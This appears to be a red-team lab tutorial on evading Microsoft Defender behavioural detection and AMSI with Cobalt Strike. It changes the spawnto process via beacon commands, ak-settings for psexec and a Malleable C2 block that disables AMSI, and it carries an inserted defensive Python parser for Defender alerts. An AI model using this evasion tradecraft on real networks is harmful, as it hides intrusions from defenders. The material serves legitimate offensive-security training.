Behavioural Detections

When dealing with behavioural detections, the Defender alerts look something like this:

PSComputerName                 : fs
ProcessName                    : C:\Windows\System32\rundll32.exe
RemediationTime                : 9/14/2022 5:40:03 PM
Resources                      : {behavior:_pid:4964:111820579542652, 
                                 process:_pid:4040,ProcessStart:133076508002529669, 
                                 process:_pid:4964,ProcessStart:133076507626927382}

The Beacon running on the file server is living inside the rundll32 process (PID 4404). When Cobalt Strike runs a post-ex command that uses the "fork & run" pattern, it will spawn a sacrificial process, inject the post-ex capability into it, retrieve the output over a named pipe, and then kill the process. The primary reason for doing this is to ensure that "unstable" post-ex tools don't crash the Beacon.
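For an analyst triaging an alert like the one above, the Resources field is the useful part: it names the PID the behaviour was attributed to and carries a ProcessStart value for each involved process. The following parser is an added example (not part of the original page or of Defender itself) that pulls those entries out and orders the processes by start time; it assumes ProcessStart is a Windows FILETIME (100 ns ticks since 1601-01-01 UTC).

```python
"""Parse the 'Resources' field of a Defender threat record into PID / start-time
entries. Added example; the alert text is copied from the page above with its
line wrapping removed, and ProcessStart is assumed to be a Windows FILETIME."""
import re
from datetime import datetime, timedelta, timezone

RESOURCES = (
    "{behavior:_pid:4964:111820579542652, "
    "process:_pid:4040,ProcessStart:133076508002529669, "
    "process:_pid:4964,ProcessStart:133076507626927382}"
)

_ENTRY = re.compile(
    r"(?P<kind>behavior|process):_pid:(?P<pid>\d+)"
    r"(?::(?P<sig>\d+))?"                  # behavior entries carry a trailing id
    r"(?:,ProcessStart:(?P<start>\d+))?"   # process entries carry a FILETIME
)


def filetime_to_utc(filetime: int) -> datetime:
    """Convert a Windows FILETIME (100 ns ticks since 1601-01-01) to a UTC datetime."""
    epoch = datetime(1601, 1, 1, tzinfo=timezone.utc)
    return epoch + timedelta(microseconds=filetime // 10)


def parse_resources(resources: str) -> list[dict]:
    """Return one dict per entry: kind, pid and (for process entries) start time."""
    entries = []
    for m in _ENTRY.finditer(resources.strip("{}")):
        entry = {"kind": m["kind"], "pid": int(m["pid"])}
        if m["start"]:
            entry["start"] = filetime_to_utc(int(m["start"]))
        entries.append(entry)
    return entries


def summarize(resources: str) -> dict:
    """Which PID the behaviour was flagged on, and the order processes started in."""
    entries = parse_resources(resources)
    flagged = [e["pid"] for e in entries if e["kind"] == "behavior"]
    procs = sorted((e for e in entries if e["kind"] == "process"), key=lambda e: e["start"])
    gap = (procs[-1]["start"] - procs[0]["start"]).total_seconds() if len(procs) > 1 else 0.0
    return {"flagged_pids": flagged, "start_order": [p["pid"] for p in procs], "spawn_gap_seconds": gap}


if __name__ == "__main__":
    for entry in parse_resources(RESOURCES):
        print(entry)
    print(summarize(RESOURCES))
```

On this record the flagged PID 4964 started about 37.5 seconds before PID 4040, which is the spawn-then-kill ordering you would expect from a fork & run post-ex job and what to line up against process-creation telemetry from the host.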

rundll32 has been the default "spawnto" for Cobalt Strike for a long time and is now a common point of detection. The service binary payload used by psexec also uses it by default, which is why you see those Beacons running as rundll32.exe.

The process used for post-ex commands and psexec can be changed on the fly in the CS GUI. To change the post-ex process, use the spawnto command. x86 and x64 must be specified individually, and environment variables can also be used.

beacon> spawnto x64 %windir%\sysnative\dllhost.exe
beacon> spawnto x86 %windir%\syswow64\dllhost.exe

The sysnative and syswow64 paths should be used rather than system32.

If we then use powerpick to get its own process name, it will return dllhost.

beacon> powerpick Get-Process -Id $pid | select ProcessName

ProcessName
-----------
dllhost    

powerpick + PowerView will now run on the file server without being caught by AMSI or this behavioural detection.

beacon> run hostname
fs

beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1
beacon> powerpick Get-Domain

Forest                  : cyberbotic.io
DomainControllers       : {dc-2.dev.cyberbotic.io}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  : cyberbotic.io
PdcRoleOwner            : dc-2.dev.cyberbotic.io
RidRoleOwner            : dc-2.dev.cyberbotic.io
InfrastructureRoleOwner : dc-2.dev.cyberbotic.io
Name                    : dev.cyberbotic.io

Use the spawnto command without any argument to reset back to default.

beacon> spawnto
[*] Tasked beacon to spawn features to default process

To change the spawnto used by psexec, use the ak-settings command.

beacon> ak-settings spawnto_x64 C:\Windows\System32\dllhost.exe
[*] Updating the spawnto_x64 process to 'C:\Windows\System32\dllhost.exe'
[*] artifact kit settings:
[*]    service     = ''
[*]    spawnto_x86 = 'C:\Windows\SysWOW64\rundll32.exe'
[*]    spawnto_x64 = 'C:\Windows\System32\dllhost.exe'

beacon> ak-settings spawnto_x86 C:\Windows\SysWOW64\dllhost.exe
[*] Updating the spawnto_x86 process to 'C:\Windows\SysWOW64\dllhost.exe'
[*] artifact kit settings:
[*]    service     = ''
[*]    spawnto_x86 = 'C:\Windows\SysWOW64\dllhost.exe'
[*]    spawnto_x64 = 'C:\Windows\System32\dllhost.exe'

The Artifact Kit does not support the use of environment variables by default. You may also change the name of the service (rather than 7 random characters) with ak-settings service [name].

Lateral movement with psexec will then land us in dllhost.exe.

The default spawnto can be changed inside Malleable C2 by including the spawnto_x64 and spawnto_x86 directives inside the post-ex block.

post-ex {
        set amsi_disable "true";

        set spawnto_x64 "%windir%\\sysnative\\dllhost.exe";
        set spawnto_x86 "%windir%\\syswow64\\dllhost.exe";
}